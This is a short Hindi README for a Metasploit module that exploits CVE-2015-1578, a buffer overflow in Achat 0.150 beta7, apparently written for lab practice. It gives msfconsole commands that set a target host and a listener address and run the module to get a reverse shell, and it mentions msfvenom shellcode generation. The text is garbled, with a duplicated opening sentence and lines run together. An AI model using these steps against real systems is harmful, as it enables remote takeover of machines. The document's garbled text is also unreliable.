यह CVE-2015-1578 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट Metasploit मॉड्यूल एक्स्प्लॉइट है, जो Windows पर Achat 0.150 beta7 में एक बफर ओवरफ्लो कमजोरी है। इस शोषण से एक निर्मित UDP पैकेट के माध्यम से दूरस्थ कोड निष्पादन होता है।
यह CVE-2015-1578 के लिए एक Metasploit मॉड्यूल है, जो विंडोज पर Achat 0.150 beta7 में एक बफर ओवरफ्लो भेद्यता है। शोषण से क्राफ्टेड UDP पैकेट के माध्यम से रिमोट कोड निष्पादन होता है।
यह मॉड्यूल Metasploit एक्सप्लॉइट डेवलपमेंट के एक स्वच्छ, न्यूनतम और सुव्यवस्थित उदाहरण के रूप में काम करने के लिए डिज़ाइन किया गया है। यह प्रदर्शित करता है:
msfvenom के माध्यम से डायनामिक यूनिकोड-एन्कोडेड शेलकोड जनरेशन$PATH में msfvenomx86/unicode_mixed एन्कोडिंग और कस्टम खराब वर्णों के साथ पेलोड उत्पन्न करने के लिए msfvenom का उपयोग करता है./install.sh
फिर Metasploit लॉन्च करें और चलाएँ:
reload_all
use exploit/windows/yaldobaoth/achat_bof
RHOSTS – लक्ष्य IP पता (आवश्यक)LHOST – रिवर्स शेल के लिए स्थानीय होस्ट IP (आवश्यक)LPORT – रिवर्स शेल के लिए स्थानीय पोर्ट (डिफ़ॉल्ट: 4444)RPORT – लक्ष्य पर रिमोट UDP पोर्ट (डिफ़ॉल्ट: 9256)msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run
यह करेगा:
LHOST:LPORT पर शेल की प्रतीक्षा करें